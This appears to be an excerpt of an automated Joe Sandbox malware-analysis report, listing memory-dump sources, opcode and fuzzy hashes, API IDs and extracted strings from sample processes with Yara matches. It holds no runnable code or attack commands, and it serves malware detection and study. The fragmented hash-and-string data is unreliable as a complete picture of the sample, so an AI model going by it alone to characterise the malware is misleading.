                                                      • Opcode Fuzzy Hash: ec14b6a2f1610bf07cdc91a779fcb3fd9068e2c07b655e6a301baca9a9632719
                                                      • Instruction Fuzzy Hash: C490026E31340006D2807158544870A005587D1203FD5D415A9059558CC9158D6D5722
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ad0c3bda36e5ac68de0a02dd3968a0d4655d120acc9e2e7f26541c9fb7006f2
                                                      • Instruction ID: 7fa6282d5f66a37f07718728309a65517167b9806d4b7e6b164dd87ef5153721
                                                      • Opcode Fuzzy Hash: 9ad0c3bda36e5ac68de0a02dd3968a0d4655d120acc9e2e7f26541c9fb7006f2
                                                      • Instruction Fuzzy Hash: AA90027630240146964072585844B4E415587E1303BD5D415A9059554CC9148D655622
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7bb965d817288e0a4c85e6f514d713400f8328b2a299c3076088e3287ca6adb
                                                      • Instruction ID: a70a9f8e8b8d7397386a302e20fc78c87d6cd42812e01bcc42bead1e9534dc5f
                                                      • Opcode Fuzzy Hash: a7bb965d817288e0a4c85e6f514d713400f8328b2a299c3076088e3287ca6adb
                                                      • Instruction Fuzzy Hash: 1490026630140007D240715854587064055D7E1302F95D011E9458554CD9158D5A5623
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a8990e38dee1a3776b54e16257f47b6c3b987077ea062f3e0b1b031153a3d029
                                                      • Instruction ID: d58d3b15c660f9681a2273f1758b05593a33c02c6d71ef1b6fb63433031b0a30
                                                      • Opcode Fuzzy Hash: a8990e38dee1a3776b54e16257f47b6c3b987077ea062f3e0b1b031153a3d029
                                                      • Instruction Fuzzy Hash: CE90027A30140406D61071585844746009687D0302F95D411A9468558D86548DA5A522
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3064ceeafb95847877d4a702d21d6503d18eb37ab9a032dde0912846e43f80b
                                                      • Instruction ID: 174927f3a0407210172700aad0d949b0e2d76f35a39c9b14ea173fe00b88da9b
                                                      • Opcode Fuzzy Hash: b3064ceeafb95847877d4a702d21d6503d18eb37ab9a032dde0912846e43f80b
                                                      • Instruction Fuzzy Hash: E190027630140406D20075985448746005587E0302F95D011AE068555EC6658D956532
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a9b03454d91a6f48ed2ec446114b62d909569a1fa7291a48d212f57c79b6836
                                                      • Instruction ID: 24f2a099677d8ac54ac06763c4beb5af1488458dd8832c6465934fdb47716000
                                                      • Opcode Fuzzy Hash: 7a9b03454d91a6f48ed2ec446114b62d909569a1fa7291a48d212f57c79b6836
                                                      • Instruction Fuzzy Hash: DF90026670540406D24071585458706006587D0202F95D011A9068554DC6598F596AA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d67565556ab7d19ba771dd8728b0b3dc5160f06f0d01eefdcee537ea77bcd94
                                                      • Instruction ID: e5ac980bbf183ac525b2c33f1216b4f71db348860c28427907109cd34311bbe1
                                                      • Opcode Fuzzy Hash: 6d67565556ab7d19ba771dd8728b0b3dc5160f06f0d01eefdcee537ea77bcd94
                                                      • Instruction Fuzzy Hash: 4D90027630140407D20071585548707005587D0202F95D411A9468558DD6568D556522
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee46935ea2979961382aa7ef2361e65d6b6dcf0072771ea575ceed19ad7fde80
                                                      • Instruction ID: 42185353863e77348371bafa71aab61e79039e133af57ef3587a68c312954a33
                                                      • Opcode Fuzzy Hash: ee46935ea2979961382aa7ef2361e65d6b6dcf0072771ea575ceed19ad7fde80
                                                      • Instruction Fuzzy Hash: 2E90027630140846D20071584444B46005587E0302F95C016A9168654D8615CD557922
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70fc0462a1ae32b1cd6cf50193b88bc178ea1c53ca5842214611ee2959086e2e
                                                      • Instruction ID: 5ab705b1a7da1e7bc0f956b08825fda2efaefd068c4194a0e5cb15ae7e0119dd
                                                      • Opcode Fuzzy Hash: 70fc0462a1ae32b1cd6cf50193b88bc178ea1c53ca5842214611ee2959086e2e
                                                      • Instruction Fuzzy Hash: 5090027630180406D2007158485470B005587D0303F95C011AA1A8555D86258D556972
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      Strings
                                                      • Execute=1, xrefs: 05884713
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058846FC
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05884742
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05884655
                                                      • ExecuteOptions, xrefs: 058846A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05884725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05884787
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05887B7F
                                                      • RTL: Resource at %p, xrefs: 05887B8E
                                                      • RTL: Re-Waiting, xrefs: 05887BAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0588728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 058872A3
                                                      • RTL: Re-Waiting, xrefs: 058872C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05887294
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0589CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: k$"$*n$.$/.$0]+$3K$3y$4$;$<;$A$F$I$I$K$P8$T$Y1$ZJ$a@$h4$i'$w$y.$}$1$X$m
                                                      • API String ID: 0-3326691694
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 89
                                                      • API String ID: 0-155395596
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17e63730570b8b109076dbdd3dff8216ed19a60b3c7ee33549029bc6de942bd8
                                                      • Instruction ID: 7369f5b99c9429405224de03e1c08feef198d3ff44492935c5082e3fc120c8eb
                                                      • Opcode Fuzzy Hash: 17e63730570b8b109076dbdd3dff8216ed19a60b3c7ee33549029bc6de942bd8
                                                      • Instruction Fuzzy Hash: C6F08271C15209EBDB14CFA4E841BDDFBB8EB04320F10436AE8249B2C0E635A751D781
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction ID: 327677bcc1f041b5b1b2d79cd8a863be6476362e06076aa7d9dddfea2ccd4d45
                                                      • Opcode Fuzzy Hash: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction Fuzzy Hash: 3BE065726042197BEA10EE59DC41FAB33ADEF88714F000419FA08A7281C670B9108BF8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1472f6ffcf88f3fb0ccee0f51451f254a1df9a5c3a4c8b1c4fa4b03fca464e5
                                                      • Instruction ID: b52ca5f608c2add00eb08cb5f9d292967b9aa21b6a0f5fb0377606d2b2f2d1a8
                                                      • Opcode Fuzzy Hash: d1472f6ffcf88f3fb0ccee0f51451f254a1df9a5c3a4c8b1c4fa4b03fca464e5
                                                      • Instruction Fuzzy Hash: DBE04F76A0223467E220568A9C06FBB775C8FC5E60F151065FE089B385E670B90146E5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfa7c97b8c020657d1ff543eea6d46bb6f18ccc184f15e92086390611f3a06e0
                                                      • Instruction ID: c1edfee7134ff3ea75a2c6da3dc42010d54c797ad1ab1b2ca3d8918d269ee4c5
                                                      • Opcode Fuzzy Hash: dfa7c97b8c020657d1ff543eea6d46bb6f18ccc184f15e92086390611f3a06e0
                                                      • Instruction Fuzzy Hash: 85E06571925108E7DB14CFA4F441BADB7B8EB44260F10536AE819DB280E235E755D781
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction ID: c20d03f6b30df76a6d281e8d47bbc5b3cf310cee480c72561a6141a32fa485c8
                                                      • Opcode Fuzzy Hash: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction Fuzzy Hash: 86E046326402247BE620AB5ADC40FAB77ACDFC5725F104429FA0CA7281C670BA118BF4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af7d881b677a493564ad801b6d0d4889f8d24ee74fa742d5ddcccab6c345131f
                                                      • Instruction ID: 0ecf3ff790fc0770abc4bc1e254812f40a63ab123b2aebece0e984a66342aa3d
                                                      • Opcode Fuzzy Hash: af7d881b677a493564ad801b6d0d4889f8d24ee74fa742d5ddcccab6c345131f
                                                      • Instruction Fuzzy Hash: C1A0124200404128541134600AC10F755C2448743478103281D7598DE1B24008A04083
                                                      • Instruction ID: 635b622f574f9d87b8610040edb6d87ede3ca89163a9af2474e06c76223555df
                                                      • Opcode Fuzzy Hash: 792e5c57c365bd0d34c46f9893f77b12d796ffc95824588b386c9c1c820656dc
                                                      • Instruction Fuzzy Hash: 7011FC10D087CAD9DB12C7BC94086AEFF711B23228F0882C9D5E52A2D2C27A5615C7B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: fa95c83fc323f10a6f3fe70e76ef13f04c5c24cebcd5108263ee0b8e4f873d76
                                                      • Instruction ID: 1bce7c67a073a35aa8bda28e3830b990ff868026cd1389deb5980cc00bb7ab6c
                                                      • Opcode Fuzzy Hash: fa95c83fc323f10a6f3fe70e76ef13f04c5c24cebcd5108263ee0b8e4f873d76
                                                      • Instruction Fuzzy Hash: 8C513172900714AAEB34DFA5DC4ABEAB7F8EF08705F04551EE5096A1C0E7B4B644CBE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: c68de6e858e82851b3aa2ebf5fd9fb60fe4a845956926dfffdab147709f7923b
                                                      • Instruction ID: 36150b215ce15d578cdf28114215eb32e1e3dcf8591f2277f4a1c5c1ed928153
                                                      • Opcode Fuzzy Hash: c68de6e858e82851b3aa2ebf5fd9fb60fe4a845956926dfffdab147709f7923b
                                                      • Instruction Fuzzy Hash: E90126B2C453546EEB12DFF4A9045EE7F74BF42364B00459BD808AF251E3B65A088791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $TRUE$e$k$o
                                                      • API String ID: 0-953628582
                                                      • Opcode ID: 82420845ce8c715ba6e1b3bde43c918fe42e3e7d24451a2e40047782b5afe3db
                                                      • Instruction ID: 41e56c932aeae342330e2a755aaac071330d32f5a59f5c2d669cc51cb0b60a2f
                                                      • Opcode Fuzzy Hash: 82420845ce8c715ba6e1b3bde43c918fe42e3e7d24451a2e40047782b5afe3db
                                                      • Instruction Fuzzy Hash: E37140B6A00704ABDB14DFA5DC85FEFB7BDAF88704F104558F6199B280D770AA41CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: c92cece04023e21e992b2a6a2cfeed121510f802eb94dab0e6d11126572fff87
                                                      • Instruction ID: efb532071df49d4a063c77331476f9e8b020bd9cf89b830c9c7f705fca6a83d1
                                                      • Opcode Fuzzy Hash: c92cece04023e21e992b2a6a2cfeed121510f802eb94dab0e6d11126572fff87
                                                      • Instruction Fuzzy Hash: 6F613FB2A00704ABDB24DFA4DC81FEFBBFDAF48714F104559E519AB240E674BA44CB61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: ef32853230a6f0aa14fa3b269022f8d52b50c2f7b9921d1d0bcb17009c17486b
                                                      • Instruction ID: 0d712e73d853b482bc8964c76e54ea5304051629a1be5996389abcc85ec9b615
                                                      • Opcode Fuzzy Hash: ef32853230a6f0aa14fa3b269022f8d52b50c2f7b9921d1d0bcb17009c17486b
                                                      • Instruction Fuzzy Hash: D74121B2900708AFDB60DFA4D885FEFBBFDAF48704F104559E519A7240D770AA40CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 7$G$J$Q$y
                                                      • API String ID: 0-1151913462
                                                      • Opcode ID: 4b9c175124d962afa06058dbe56b826565776651e40c825d53011fe36ff68b89
                                                      • Instruction ID: 8376397f2f8c80a3f83b2297fc7587348827264337d4ebfda3fbbb58fc0ad799
                                                      • Opcode Fuzzy Hash: 4b9c175124d962afa06058dbe56b826565776651e40c825d53011fe36ff68b89
                                                      • Instruction Fuzzy Hash: 4F3164B1E11119ABEB10DBA4DD41FFE73B8EF04308F109199E908A7280E775AB048BE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 66943b9a3a9ee200681626330ba4238d3ea38232a8ea8f50ff94954c39e177bb
                                                      • Instruction ID: c0b3a508888dcf1cd669e70564c5c0da2fdae9984ba18d8d4a3d9c87a9a5e060
                                                      • Opcode Fuzzy Hash: 66943b9a3a9ee200681626330ba4238d3ea38232a8ea8f50ff94954c39e177bb
                                                      • Instruction Fuzzy Hash: F0B10EB6A00704AFDB24DFA4DC85FEFB7F9AF88704F108558F6599B280D674AA41CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: 515f5d56dfddf8ff8b42f01515523499ee8bfa182538aefa11c0bcccda3887a7
                                                      • Instruction ID: fc07be36c67f9f5a277223223af8305a20fa9cf8894e3dd8bf96282a602738ef
                                                      • Opcode Fuzzy Hash: 515f5d56dfddf8ff8b42f01515523499ee8bfa182538aefa11c0bcccda3887a7
                                                      • Instruction Fuzzy Hash: A2717472E002287EEF65EB55DC85FEF73BCAF85604F005199B54996040EE747B848FA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 484d485da9283b870b464368bf145e5569316716aefe80b274688f1039c5e403
                                                      • Instruction ID: 5353abba2b14efde66219f8fbc6f4eba6325164ea7f12310d7ddd7ddc53ecf93
                                                      • Opcode Fuzzy Hash: 484d485da9283b870b464368bf145e5569316716aefe80b274688f1039c5e403
                                                      • Instruction Fuzzy Hash: 68416F719522687AFB01EBA1CC42FFF7B7C9F65605F005049FA04AA1C0E7B46B1187EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 5d863bc5ee99301b1a0be0b63871539ec7459951edd7588ae86d8825145e22a3
                                                      • Instruction ID: 4024b57aff491774c918ca89cd711a4f1bfd7a003b005854bb8795d8dc07f547
                                                      • Opcode Fuzzy Hash: 5d863bc5ee99301b1a0be0b63871539ec7459951edd7588ae86d8825145e22a3
                                                      • Instruction Fuzzy Hash: 10313BB19522287AFB01EB91CC42FFF773CAF55605F005049FA046A1C0EBB46B1587EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: b99570132ff0159e6634f778ea2bb5732b09d921f4c3fdcb2464c344ea086f87
                                                      • Instruction ID: fa9270d7cdbde9237ffc0de8682fd2ae20b819310b0f0884916dd7bb27c85a1f
                                                      • Opcode Fuzzy Hash: b99570132ff0159e6634f778ea2bb5732b09d921f4c3fdcb2464c344ea086f87
                                                      • Instruction Fuzzy Hash: 73415371E40228BEEF50DB64CC45FEE73B8EF45704F0055DAA54CA6140EB746B848FA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 271e477dc3f40e7bb517306d9b976ff0acf75f59f3d7e981f6f1ce304b6dccfd
